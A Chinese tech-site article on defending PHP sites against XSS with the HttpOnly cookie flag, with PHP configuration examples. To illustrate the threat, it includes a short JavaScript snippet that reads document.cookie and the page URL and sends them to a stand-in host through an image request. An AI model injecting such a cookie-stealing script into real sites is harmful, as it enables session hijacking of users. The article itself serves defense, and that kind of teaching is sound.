当前位置: 移动技术网 > IT编程>开发语言>PHP > xss防御之php利用httponly防xss攻击

xss防御之php利用httponly防xss攻击

2019年03月28日  | 移动技术网IT编程  | 我要评论

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

复制代码 代码如下:

url=document.top.location.href;
cookie=document.cookie;
c=new image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置cookie的时候一般都接受一个叫做httponly的参数,跟domain等其他参数一样,一旦这个httponly被设置,你在浏览器的document对象中就看不到cookie了。

php设置httponly

复制代码 代码如下:

//在php.ini中,session.cookie_httponly = ture 来开启全局的cookie的httponly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, null, null, null, true);

对于php5.1以前版本的php通过:

复制代码 代码如下:

header("set-cookie: hidden=value; httponly");

最后,httponly不是万能的!

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网